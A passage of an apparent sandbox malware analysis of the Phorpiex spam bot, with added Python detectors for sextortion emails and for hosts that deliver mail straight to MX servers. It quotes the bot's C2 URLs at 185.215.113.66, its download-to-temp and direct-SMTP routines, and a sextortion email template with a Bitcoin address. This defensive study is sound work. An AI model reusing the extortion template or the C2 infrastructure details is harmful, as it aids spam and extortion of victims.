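        "mailenable_hop": any(RE_MAILENABLE.match(h) for h in received),
        "qmail_hop": any(RE_QMAIL.match(h) for h in received),
        "msgid_shape": bool(RE_MSGID.match((msg.get("Message-ID") or "").strip())),
        "btc_wallet": BTC_WALLET in body,
        "payment_urls": [u for u in PAYMENT_URLS if u in body],
        "phrases": [p for p in BODY_PHRASES if p in text],
    }


def sextortion_score(raw_message: str) -> int:
    """Weighted sum of the indicators; each payment URL and template phrase adds 2."""
    found = sextortion_indicators(raw_message)
    score = sum(w for key, w in WEIGHTS.items() if found[key])
    return score + 2 * len(found["payment_urls"]) + 2 * len(found["phrases"])


def is_phorpiex_sextortion(raw_message: str, threshold: int = 8) -> bool:
    """Constructed threshold: the wallet plus one forged hop is enough to flag."""
    return sextortion_score(raw_message) >= threshold


# Constructed sample following the template (documentation addresses only).
SAMPLE = """\
Received: from mail.example.net ([203.0.113.7]) by mx.example.org with MailEnable ESMTP; Tue, 7 May 2024 10:11:12 +0000
Received: (qmail 4242 invoked by uid 1008); Tue, 7 May 2024 10:11:12 +0000
Message-ID: <a1b2c3.d4e5f6@example.net>
Mime-Version: 1.0
Content-type: text/plain;
From: victim@example.org
To: victim@example.org
Subject: I RECORDED YOU!

Some time ago your device was infected with my private trojan, R.A.T (Remote Administration Tool), if you want to find out more about it simply use Google.
All you need is $1800 USD in Bitcoin (BTC) transfer to my account.
My Bitcoin (BTC) address is: 19Y9VkeeSUNgqm6qbSy6Zkpk9oHaS3eHXT
https://bitpay.com/buy-bitcoin/?crypto=BTC
https://paybis.com/
Check the sender of this email, I have sent it from your email account.
"""

# Constructed benign message whose Message-ID has the same <x.y@z> shape.
BENIGN = """\
Received: from smtp.example.com ([198.51.100.4]) by mx.example.org with ESMTPS id abc; Tue, 7 May 2024 10:11:12 +0000
Message-ID: <20240507101112.GA1234@example.com>
From: alice@example.com
To: bob@example.org
Subject: Lunch?

Want to grab lunch tomorrow?
"""
```

The Message-ID shape alone scores 1 on the benign message, which is why it only serves as a tie-breaker; the forged MailEnable and qmail hops, which a real receiving MTA would never emit for itself, and the wallet string carry the decision.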

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 00D7244B
                                                                                • srand.MSVCR90 ref: 00D72452
                                                                                • _wmemset.LIBCPMTD ref: 00D72468
                                                                                • _wmemset.LIBCPMTD ref: 00D7247E
                                                                                • _wmemset.LIBCPMTD ref: 00D72494
                                                                                • _wmemset.LIBCPMTD ref: 00D724AA
                                                                                • memset.MSVCR90 ref: 00D724BE
                                                                                  • Part of subcall function 00D717D0: InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00D717E3
                                                                                  • Part of subcall function 00D717D0: InternetOpenUrlA.WININET(00000000,http://icanhazip.com/,00000000,00000000,00000000,00000000), ref: 00D71807
                                                                                  • Part of subcall function 00D717D0: InternetReadFile.WININET(00000000,?,00000063,?), ref: 00D71824
                                                                                  • Part of subcall function 00D717D0: wsprintfA.USER32 ref: 00D71860
                                                                                  • Part of subcall function 00D717D0: InternetCloseHandle.WININET(00000000), ref: 00D71882
                                                                                  • Part of subcall function 00D717D0: InternetCloseHandle.WININET(?), ref: 00D718A1
                                                                                • strcpy.MSVCR90(00D77310,00000000), ref: 00D724D1
                                                                                • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 00D724EA
                                                                                • mbstowcs.MSVCR90 ref: 00D72503
                                                                                • wsprintfW.USER32 ref: 00D7251E
                                                                                  • Part of subcall function 00D718D0: memset.MSVCR90 ref: 00D718E2
                                                                                  • Part of subcall function 00D718D0: InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36,00000001,00000000,00000000,00000000), ref: 00D718F7
                                                                                  • Part of subcall function 00D718D0: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00D7191A
                                                                                  • Part of subcall function 00D718D0: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00D71949
                                                                                  • Part of subcall function 00D718D0: InternetReadFile.WININET(00000000,00D76F10,000003FF,?), ref: 00D7196A
                                                                                  • Part of subcall function 00D718D0: WriteFile.KERNEL32(000000FF,00D76F10,00000000,?,00000000), ref: 00D7198D
                                                                                  • Part of subcall function 00D718D0: CloseHandle.KERNEL32(000000FF), ref: 00D71999
                                                                                  • Part of subcall function 00D718D0: InternetCloseHandle.WININET(00000000), ref: 00D719BD
                                                                                  • Part of subcall function 00D718D0: InternetCloseHandle.WININET(00000000), ref: 00D719C7
                                                                                • atoi.MSVCR90 ref: 00D7253B
                                                                                • Sleep.KERNEL32(000003E8), ref: 00D7255B
                                                                                • _wmemset.LIBCPMTD ref: 00D7256F
                                                                                • _wmemset.LIBCPMTD ref: 00D72583
                                                                                • rand.MSVCR90 ref: 00D7258B
                                                                                • wsprintfW.USER32 ref: 00D725AE
                                                                                • rand.MSVCR90 ref: 00D725B7
                                                                                • rand.MSVCR90 ref: 00D725CB
                                                                                • rand.MSVCR90 ref: 00D725DF
                                                                                • wsprintfW.USER32 ref: 00D72604
                                                                                  • Part of subcall function 00D718D0: InternetReadFile.WININET(00000000,00D76F10,000003FF,?), ref: 00D719B3
                                                                                • PathFileExistsW.SHLWAPI(00D77508), ref: 00D72628
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00002320,00000000,00000000,00000000), ref: 00D72668
                                                                                • rand.MSVCR90 ref: 00D7266E
                                                                                • Sleep.KERNEL32 ref: 00D7267F
                                                                                • DeleteFileW.KERNEL32(00D77508), ref: 00D7268C
                                                                                • atoi.MSVCR90 ref: 00D726A6
                                                                                • ExitProcess.KERNEL32 ref: 00D726BF
                                                                                • ExitThread.KERNEL32 ref: 00D726CC
                                                                                Similarity
                                                                                • API ID: Internet$File$_wmemset$CloseHandlerand$Openwsprintf$Read$CreateExitSleepThreadatoimemset$CountDeleteEnvironmentExistsExpandPathProcessStringsTickWritembstowcssrandstrcpy
                                                                                • String ID: %s%d.txt$%s\%d%d%d.jpg$%sn.txt$%temp%$^Iu
                                                                                • API String ID: 3135460431-1377136663
                                                                                • Opcode ID: 19c459ad6bf287fcb317536939e963bcb7a626cd642cd9515c200bbfe5ca6fff
                                                                                • Instruction ID: 85f67ef8547ce4c7ed95e9122e4f29fadbf17b94c60d7819d7a76dfef529df2b
                                                                                • Opcode Fuzzy Hash: 19c459ad6bf287fcb317536939e963bcb7a626cd642cd9515c200bbfe5ca6fff
                                                                                • Instruction Fuzzy Hash: DA5172B5D80344ABE710BB609C4BFEA3329EB54705F048469F64DA52C2FEB55688CA72

Control-flow Graph (d718d0 download routine, summarized): memset, InternetOpenW → InternetOpenUrlW → either CreateFileW followed by a loop of InternetReadFile (0x3FF-byte chunks into the buffer at 00D76F10) and WriteFile (d71958-d71993) until one of the two checks after the read exits, then CloseHandle; or, in the other branch (d719a1-d719b3), a single InternetReadFile into that buffer without creating a file. Failure at InternetOpenW or InternetOpenUrlW jumps straight to the InternetCloseHandle cleanup (d719b9-d719d5).
                                                                                APIs
                                                                                • memset.MSVCR90 ref: 00D718E2
                                                                                • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36,00000001,00000000,00000000,00000000), ref: 00D718F7
                                                                                • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00D7191A
                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00D71949
                                                                                • InternetReadFile.WININET(00000000,00D76F10,000003FF,?), ref: 00D7196A
                                                                                • WriteFile.KERNEL32(000000FF,00D76F10,00000000,?,00000000), ref: 00D7198D
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 00D71999
                                                                                • InternetReadFile.WININET(00000000,00D76F10,000003FF,?), ref: 00D719B3
                                                                                • InternetCloseHandle.WININET(00000000), ref: 00D719BD
                                                                                • InternetCloseHandle.WININET(00000000), ref: 00D719C7
                                                                                Strings
                                                                                • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36, xrefs: 00D718F2
                                                                                Similarity
                                                                                • API ID: Internet$File$CloseHandle$OpenRead$CreateWritememset
                                                                                • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
                                                                                • API String ID: 4022733741-2132150883
                                                                                • Opcode ID: c76abbe703dc41675ff05990482401da1997fe7efa432ffd52558fd9e2ea195f
                                                                                • Instruction ID: 3fb1abb827e196669b71af9b9e03d587e26537c6c0dc7963bf19173df685e14a
                                                                                • Opcode Fuzzy Hash: c76abbe703dc41675ff05990482401da1997fe7efa432ffd52558fd9e2ea195f
                                                                                • Instruction Fuzzy Hash: 57312174A40304FBDB14DB94DC5AFAEB774AB44700F648514F719AA2D0F7B09A44CB71

Control-flow Graph (d71b2d SMTP greeting, summarized): StrStrA selects one of two wsprintfA formats (EHLO %s / HELO %s, blocks d71b3e and d71b60), call d71120 sends the line, the reply is handled by the shared response loop (d71a9a-d71b1b, calls d71160 and d711c0), and every failure path ends in shutdown/closesocket (d722b1-d722d9).
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2105995943.0000000000D71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00D70000, based on PE: true
                                                                                • Associated: 0000000A.00000002.2105981650.0000000000D70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.2106010574.0000000000D74000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.2106024579.0000000000D76000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.2106048378.0000000000D78000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_d70000_2006625995.jbxd
                                                                                Similarity
                                                                                • API ID: wsprintf$closesocketshutdown
                                                                                • String ID: EHLO %s$HELO %s
                                                                                • API String ID: 4205972133-3160789797
                                                                                • Opcode ID: 10183935c51cebb398967900b579fa85ebe8760054c8d056db4345851e414546
                                                                                • Instruction ID: 52526c86ecdf6bd2acdac5311b72ac904f8d15b44b7873557a74cd06e0f551bc
                                                                                • Opcode Fuzzy Hash: 10183935c51cebb398967900b579fa85ebe8760054c8d056db4345851e414546
                                                                                • Instruction Fuzzy Hash: 0C214CB5D00318EFCB10DBA4DC49BAEB778BB44704F0486A9EA0DA2241F7749594CB78

Control-flow Graph (d72320 thread routine, summarized): GetTickCount → srand → _wfopen; on success a fgets loop reads the file line by line, calls rand for each line and, depending on the result, strcpy (d72386-d723d2), then fclose; afterwards calls d71400 and d718b0, and either enters the SMTP connect routine d719e0 or ExitThread.
                                                                                Similarity
                                                                                • API ID: CountExitThreadTick_wfopenfclosefgetsrandsrandstrcpy
                                                                                • String ID:
                                                                                • API String ID: 3964472883-0
                                                                                • Opcode ID: 9011f00c698843e5b12c4dec29ee109088c7be816951b5b83033704e0af0e5a2
                                                                                • Instruction ID: 8ecbccad7d3cc7be2924fedd41fecc47d8b22742ec129ff63674645abff78e45
                                                                                • Opcode Fuzzy Hash: 9011f00c698843e5b12c4dec29ee109088c7be816951b5b83033704e0af0e5a2
                                                                                • Instruction Fuzzy Hash: 702166B5C8021C97DB20A760DD8ABE97238EB20305F4485E8E50D61241FB759BD8CFB2

Control-flow Graph (d71bb6 MAIL FROM, summarized): two wsprintfA calls (MAIL FROM: %s and <%s>) → call d71120 (lstrlenA, send) → shared response loop d71a9a-d71b1b → shutdown/closesocket (d722b1-d722d9) on failure.
                                                                                APIs
                                                                                • wsprintfA.USER32 ref: 00D71BC6
                                                                                • wsprintfA.USER32 ref: 00D71BE2
                                                                                  • Part of subcall function 00D71120: lstrlenA.KERNEL32(?), ref: 00D7112D
                                                                                  • Part of subcall function 00D71120: send.WS2_32(?,?,000000FF,00000000), ref: 00D71144
                                                                                • shutdown.WS2_32(000000FF,00000002), ref: 00D722C3
                                                                                • closesocket.WS2_32(000000FF), ref: 00D722CD
                                                                                Similarity
                                                                                • API ID: wsprintf$closesocketlstrlensendshutdown
                                                                                • String ID: <%s>$MAIL FROM: %s
                                                                                • API String ID: 1146405-791590210
                                                                                • Opcode ID: 821f4e20a40b2b2695b0b94a464f24d47344071677a257f852b6a741cd63fd5d
                                                                                • Instruction ID: 599651c4e86015a1fcad0917d908cc472cdba0bc818ab4c943da5b33cac0f976
                                                                                • Opcode Fuzzy Hash: 821f4e20a40b2b2695b0b94a464f24d47344071677a257f852b6a741cd63fd5d
                                                                                • Instruction Fuzzy Hash: 1C21DEB5D002189FCF11DB98DC49BEEB778BB44304F4481A9EA0DA6241F7749994CB75
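The EHLO/HELO and MAIL FROM routines above are driven by the connect routine at 00D719E0, which resolves the recipient domain's MX record (DnsQuery_A with type 0x0F) and connects to port 25 (htons(0x19)) itself, so the infected host talks to many foreign MX servers directly instead of going through the site relay. That pattern is easy to hunt for in DNS and connection logs. The script below does so over constructed Zeek-style log lines; it is an added example, not part of the report, and the log layout, field order, thresholds and the relay allow-list are assumptions.

```python
"""Hunt for hosts delivering mail straight to MX servers, the behaviour of the
Phorpiex spam routine (DnsQuery_A type 0x0F = MX, connect to port 25).
Added example over constructed Zeek-style TSV lines; the field order, the
thresholds and the relay allow-list are assumptions, not from the report."""
from collections import defaultdict
from typing import Dict, Iterator, List, Set

# Constructed dns.log-like lines: ts, src_ip, query, qtype_name
DNS_LOG = """\
1715076000.1\t10.0.0.17\texample.com\tMX
1715076000.4\t10.0.0.17\texample.net\tMX
1715076000.9\t10.0.0.17\texample.org\tMX
1715076001.2\t10.0.0.17\texample.edu\tMX
1715076002.0\t10.0.0.25\texample.com\tMX
1715076002.3\t10.0.0.25\texample.net\tMX
1715076002.6\t10.0.0.25\texample.org\tMX
1715076003.0\t10.0.0.30\twww.example.org\tA
"""

# Constructed conn.log-like lines: ts, src_ip, dst_ip, dst_port, proto
CONN_LOG = """\
1715076001.0\t10.0.0.17\t192.0.2.10\t25\ttcp
1715076001.3\t10.0.0.17\t198.51.100.20\t25\ttcp
1715076001.8\t10.0.0.17\t203.0.113.30\t25\ttcp
1715076002.1\t10.0.0.17\t203.0.113.40\t25\ttcp
1715076002.2\t10.0.0.25\t192.0.2.10\t25\ttcp
1715076002.5\t10.0.0.25\t198.51.100.20\t25\ttcp
1715076002.8\t10.0.0.25\t203.0.113.30\t25\ttcp
1715076003.1\t10.0.0.30\t10.0.0.25\t587\ttcp
"""

# Assumed: the site's legitimate outbound relay, which is expected to do this.
MAIL_RELAYS: Set[str] = {"10.0.0.25"}


def parse_tsv(log: str) -> Iterator[List[str]]:
    for line in log.splitlines():
        if line and not line.startswith("#"):
            yield line.split("\t")


def mx_query_counts(dns_log: str) -> Dict[str, int]:
    """Number of MX lookups per source host."""
    counts: Dict[str, int] = defaultdict(int)
    for _ts, src, _query, qtype in parse_tsv(dns_log):
        if qtype == "MX":
            counts[src] += 1
    return dict(counts)


def smtp_destinations(conn_log: str) -> Dict[str, Set[str]]:
    """Distinct TCP/25 peers per source host."""
    dests: Dict[str, Set[str]] = defaultdict(set)
    for _ts, src, dst, dport, proto in parse_tsv(conn_log):
        if proto == "tcp" and dport == "25":
            dests[src].add(dst)
    return dict(dests)


def direct_to_mx_senders(dns_log: str, conn_log: str, min_mx: int = 3,
                         min_dests: int = 3, relays: Set[str] = MAIL_RELAYS) -> dict:
    """Hosts that both resolve MX records and open TCP/25 to several peers,
    excluding the known relays.  Thresholds are constructed tuning knobs."""
    mx = mx_query_counts(dns_log)
    smtp = smtp_destinations(conn_log)
    hits = {}
    for src in set(mx) & set(smtp):
        if src in relays:
            continue
        if mx[src] >= min_mx and len(smtp[src]) >= min_dests:
            hits[src] = {"mx_queries": mx[src], "smtp_peers": sorted(smtp[src])}
    return hits
```

The relay in the sample logs shows exactly the same footprint as the bot, which is the point of the allow-list: a workstation that performs MX lookups and talks TCP/25 to unrelated hosts is the anomaly, not the behaviour itself. Dropping the allow-list (relays=set()) flags both hosts.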

Control-flow Graph (d71320, summarized): GetTickCount → srand, then a loop of rand → sprintf("%s%d") (d71353-d71376) controlled by the check at d7134b, exiting at d71378-d71387.
                                                                                Similarity
                                                                                • API ID: CountTickrandsprintfsrand
                                                                                • String ID: %s%d
                                                                                • API String ID: 2526408171-1110647743
                                                                                • Opcode ID: 6df7dfcacbe68101792d455d9234c167510d19c3ae1a4f4368850c0771820b18
                                                                                • Instruction ID: 9e39401b78c96a1dcb2364fd8daa6dc04505b1af675db72470c937e466774638
                                                                                • Opcode Fuzzy Hash: 6df7dfcacbe68101792d455d9234c167510d19c3ae1a4f4368850c0771820b18
                                                                                • Instruction Fuzzy Hash: D5F014B4A04248EBDB05DB98C982B6D77A5EB95300F10C189F80D4B341E771AE009BB6

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 308 d719e0-d71a05 call d72300 311 d722d3-d722d9 308->311 312 d71a0b-d71a26 call d710a0 308->312 312->311 315 d71a2c-d71a3f socket 312->315 315->311 316 d71a45-d71a49 315->316 316->311 317 d71a4f-d71a62 connect 316->317 318 d722bd-d722cd shutdown closesocket 317->318 319 d71a68-d71a89 setsockopt 317->319 318->311 320 d71a90-d71a94 319->320 321 d722b1-d722ba 320->321 322 d71a9a-d71a9e 320->322 321->318 322->321 323 d71aa4-d71ac9 call d71160 322->323 326 d71ad0-d71aef call d711c0 323->326 327 d71acb 323->327 330 d71af6-d71b15 326->330 331 d71af1 326->331 327->321 332 d722ac 330->332 333 d71b1b 330->333 331->321 332->320 333->332
                                                                                APIs
                                                                                  • Part of subcall function 00D72300: strchr.MSVCR90 ref: 00D7230B
                                                                                  • Part of subcall function 00D710A0: DnsQuery_A.DNSAPI(00000000,0000000F,00000000,00000000,00000000,00000000), ref: 00D710C4
                                                                                  • Part of subcall function 00D710A0: htons.WS2_32(00000019), ref: 00D710F5
                                                                                  • Part of subcall function 00D710A0: DnsFree.DNSAPI(00000000,00000001), ref: 00D7110F
                                                                                • socket.WS2_32(00000002,00000001,00000006), ref: 00D71A32
                                                                                • connect.WS2_32(000000FF,?,00000010), ref: 00D71A59
                                                                                • setsockopt.WS2_32(000000FF,00000006,00000001,00000001,00000004), ref: 00D71A83
                                                                                • shutdown.WS2_32(000000FF,00000002), ref: 00D722C3
                                                                                • closesocket.WS2_32(000000FF), ref: 00D722CD
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2105995943.0000000000D71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00D70000, based on PE: true
                                                                                • Associated: 0000000A.00000002.2105981650.0000000000D70000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000A.00000002.2106010574.0000000000D74000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000A.00000002.2106024579.0000000000D76000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000A.00000002.2106048378.0000000000D78000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_d70000_2006625995.jbxd
                                                                                Similarity
                                                                                • API ID: FreeQuery_closesocketconnecthtonssetsockoptshutdownsocketstrchr
                                                                                • String ID:
                                                                                • API String ID: 3655475579-0
                                                                                • Opcode ID: 33d8b817bcb7d7874506a39d4fb17f995e8c891364af01ecf007c88d331e47b9
                                                                                • Instruction ID: 428fd21aba8d388f9aacd1addba147b5b230d9030fcba57a837e967e2858e543
                                                                                • Opcode Fuzzy Hash: 33d8b817bcb7d7874506a39d4fb17f995e8c891364af01ecf007c88d331e47b9
                                                                                • Instruction Fuzzy Hash: AE415D75D00318DFDB10DBA8DC49BEEB779BB04304F048298EA1DA6281F7749A85CFA5
                                                                                APIs
                                                                                • wsprintfA.USER32 ref: 00D71C37
                                                                                  • Part of subcall function 00D71120: lstrlenA.KERNEL32(?), ref: 00D7112D
                                                                                  • Part of subcall function 00D71120: send.WS2_32(?,?,000000FF,00000000), ref: 00D71144
                                                                                • shutdown.WS2_32(000000FF,00000002), ref: 00D722C3
                                                                                • closesocket.WS2_32(000000FF), ref: 00D722CD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2105995943.0000000000D71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00D70000, based on PE: true
                                                                                • Associated: 0000000A.00000002.2105981650.0000000000D70000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000A.00000002.2106010574.0000000000D74000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000A.00000002.2106024579.0000000000D76000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000A.00000002.2106048378.0000000000D78000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_d70000_2006625995.jbxd
                                                                                Similarity
                                                                                • API ID: closesocketlstrlensendshutdownwsprintf
                                                                                • String ID: RCPT TO: <%s>
                                                                                • API String ID: 1492768164-1854338671
                                                                                • Opcode ID: 8d371442a549b991445b0ac54fa12cb85b00a0bcd48e5e97c04d5ed91d2d1d68
                                                                                • Instruction ID: 6c2968a6c01e163972150b197c95a9d44258ac13a337ec2a6b48c84a72d65b68
                                                                                • Opcode Fuzzy Hash: 8d371442a549b991445b0ac54fa12cb85b00a0bcd48e5e97c04d5ed91d2d1d68
                                                                                • Instruction Fuzzy Hash: 1C11FEB5D00218DFCF10DB94DC49BAEB778BB48345F0482A9E90DA6241F7749994CF79
                                                                                APIs
                                                                                • StrCmpNA.SHLWAPI(354,220,00000003), ref: 00D71208
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2105995943.0000000000D71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00D70000, based on PE: true
                                                                                • Associated: 0000000A.00000002.2105981650.0000000000D70000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000A.00000002.2106010574.0000000000D74000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000A.00000002.2106024579.0000000000D76000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000A.00000002.2106048378.0000000000D78000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_d70000_2006625995.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 220$250$354
                                                                                • API String ID: 0-1679323658
                                                                                • Opcode ID: fe149fa031a68f0834c1c1338f95e360a3ab7b1a1abba1beeaf8d4e07452f581
                                                                                • Instruction ID: 37c3a6f82e73636d13ce4d962c0e9c9343704ee415dfd8d8bc72e85701efa223
                                                                                • Opcode Fuzzy Hash: fe149fa031a68f0834c1c1338f95e360a3ab7b1a1abba1beeaf8d4e07452f581
                                                                                • Instruction Fuzzy Hash: 4DF04974905309DBCF00EFD8DA497AEBBB4BB00304F608659D909AB340E3709B44DBB5
                                                                                APIs
                                                                                  • Part of subcall function 00D71120: lstrlenA.KERNEL32(?), ref: 00D7112D
                                                                                  • Part of subcall function 00D71120: send.WS2_32(?,?,000000FF,00000000), ref: 00D71144
                                                                                • shutdown.WS2_32(000000FF,00000002), ref: 00D722C3
                                                                                • closesocket.WS2_32(000000FF), ref: 00D722CD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2105995943.0000000000D71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00D70000, based on PE: true
                                                                                • Associated: 0000000A.00000002.2105981650.0000000000D70000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000A.00000002.2106010574.0000000000D74000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000A.00000002.2106024579.0000000000D76000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000A.00000002.2106048378.0000000000D78000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_d70000_2006625995.jbxd
                                                                                Similarity
                                                                                • API ID: closesocketlstrlensendshutdown
                                                                                • String ID: DATA
                                                                                • API String ID: 317823648-550793329
                                                                                • Opcode ID: 969fd7ebd1d24c49d0e41b1066fd163fbf1f166c5c90aa3c4bd685bc9e17ac14
                                                                                • Instruction ID: a043ed6028e90e66bb3887c9dd5cfa0b99d2f087e3dc53cb5df90b174fc26dc6
                                                                                • Opcode Fuzzy Hash: 969fd7ebd1d24c49d0e41b1066fd163fbf1f166c5c90aa3c4bd685bc9e17ac14
                                                                                • Instruction Fuzzy Hash: FE014CB5D00318EFCF009BA4DC497AEB778BB04344F048259E909B6291F7788484CB35
                                                                                APIs
                                                                                  • Part of subcall function 00D71120: lstrlenA.KERNEL32(?), ref: 00D7112D
                                                                                  • Part of subcall function 00D71120: send.WS2_32(?,?,000000FF,00000000), ref: 00D71144
                                                                                • shutdown.WS2_32(000000FF,00000002), ref: 00D722C3
                                                                                • closesocket.WS2_32(000000FF), ref: 00D722CD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2105995943.0000000000D71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00D70000, based on PE: true
                                                                                • Associated: 0000000A.00000002.2105981650.0000000000D70000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000A.00000002.2106010574.0000000000D74000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000A.00000002.2106024579.0000000000D76000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000A.00000002.2106048378.0000000000D78000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_d70000_2006625995.jbxd
                                                                                Similarity
                                                                                • API ID: closesocketlstrlensendshutdown
                                                                                • String ID: QUIT
                                                                                • API String ID: 317823648-1967077921
                                                                                • Opcode ID: f19bc1594a8eb87d9df464cc4b2bd119a4f61f71e52192565459f02000c8d23b
                                                                                • Instruction ID: 6eb4b539df615e71bb6a037c9a6569ad9bfd3fa0f7000651c782fb1589c5f059
                                                                                • Opcode Fuzzy Hash: f19bc1594a8eb87d9df464cc4b2bd119a4f61f71e52192565459f02000c8d23b
                                                                                • Instruction Fuzzy Hash: C001FF75D00318AFCF10DBA4DC49BADB778BB04355F048269E959B6281F7788585CB35

                                                                                Callgraph

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 0 3910a0-3910b8 Sleep call 391000 3 3910ba-391117 DeleteUrlCacheEntry * 9 0->3 4 39111d-391120 0->4 3->4
                                                                                APIs
                                                                                • Sleep.KERNELBASE(000007D0), ref: 003910A8
                                                                                  • Part of subcall function 00391000: ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 0039101A
                                                                                  • Part of subcall function 00391000: wsprintfW.USER32 ref: 00391033
                                                                                  • Part of subcall function 00391000: PathFileExistsW.KERNELBASE(?), ref: 00391043
                                                                                • DeleteUrlCacheEntry.WININET(http://185.215.113.66/1), ref: 003910BF
                                                                                • DeleteUrlCacheEntry.WININET(http://185.215.113.66/2), ref: 003910CA
                                                                                • DeleteUrlCacheEntry.WININET(http://185.215.113.66/3), ref: 003910D5
                                                                                • DeleteUrlCacheEntry.WININET(http://185.215.113.66/4), ref: 003910E0
                                                                                • DeleteUrlCacheEntry.WININET(http://185.215.113.66/5), ref: 003910EB
                                                                                • DeleteUrlCacheEntry.WININET(http://185.215.113.66/6), ref: 003910F6
                                                                                • DeleteUrlCacheEntry.WININET(http://185.215.113.66/_1), ref: 00391101
                                                                                • DeleteUrlCacheEntry.WININET(http://185.215.113.66/_2), ref: 0039110C
                                                                                • DeleteUrlCacheEntry.WININET(http://185.215.113.66/_3), ref: 00391117
                                                                                Strings
                                                                                • http://185.215.113.66/2, xrefs: 003910C5
                                                                                • http://185.215.113.66/5, xrefs: 003910E6
                                                                                • http://185.215.113.66/_3, xrefs: 00391112
                                                                                • http://185.215.113.66/4, xrefs: 003910DB
                                                                                • http://185.215.113.66/1, xrefs: 003910BA
                                                                                • http://185.215.113.66/3, xrefs: 003910D0
                                                                                • http://185.215.113.66/6, xrefs: 003910F1
                                                                                • http://185.215.113.66/_2, xrefs: 00391107
                                                                                • http://185.215.113.66/_1, xrefs: 003910FC
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.1922496157.0000000000391000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00390000, based on PE: true
                                                                                • Associated: 0000000D.00000002.1922475948.0000000000390000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 0000000D.00000002.1922511863.0000000000392000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 0000000D.00000002.1922526704.0000000000394000.00000002.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_390000_2711236308.jbxd
                                                                                Similarity
                                                                                • API ID: CacheDeleteEntry$EnvironmentExistsExpandFilePathSleepStringswsprintf
